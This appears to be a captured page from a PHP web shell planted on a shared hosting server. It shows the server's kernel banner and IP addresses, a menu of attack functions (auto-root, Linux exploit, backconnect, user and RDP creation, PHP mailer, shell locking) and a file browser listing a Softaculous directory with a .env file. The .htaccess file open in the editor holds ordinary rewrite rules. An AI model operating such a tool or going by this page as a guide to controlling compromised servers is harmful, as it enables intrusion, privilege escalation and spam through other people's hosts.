Linux server123.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.126.127 | : 216.73.216.107
Cant Read [ /etc/named.conf ]
?8.4.14
ezdajrnh
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
atlantis /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
.env
231
B
-rw-r--r--
.htaccess
679
B
-rw-r--r--
edit.php
4.47
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
9.01
KB
-rw-r--r--
fileindex.php
275
B
-rw-r--r--
import.php
3.38
KB
-rw-r--r--
info.xml
2.8
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
5.41
KB
-rw-r--r--
install.xml
569
B
-rw-r--r--
md5
6.45
KB
-rw-r--r--
notes.txt
603
B
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<FilesMatch "\.(env|htaccess|git)$"> deny from all </FilesMatch> <IfModule mod_rewrite.c> <IfModule mod_negotiation.c> Options -MultiViews </IfModule> RewriteEngine On RewriteBase [[relativeurl]]/ # Redirect Trailing Slashes... RewriteRule ^(.*?)\.(css|js|jpg|jpeg|JPEG|png|pdf|eot|ttf|woff|woff2|otf|svg|eot|gif)$ - [L,R=301] RewriteRule ^(.*)/$ /$1 [L,R=301] RewriteRule ^(?:app|bootstrap|config|database|modules|resources|storage|vendor)\b index.php/$0 [L] # Handle Front Controller... RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^ index.php [L] </IfModule>
Close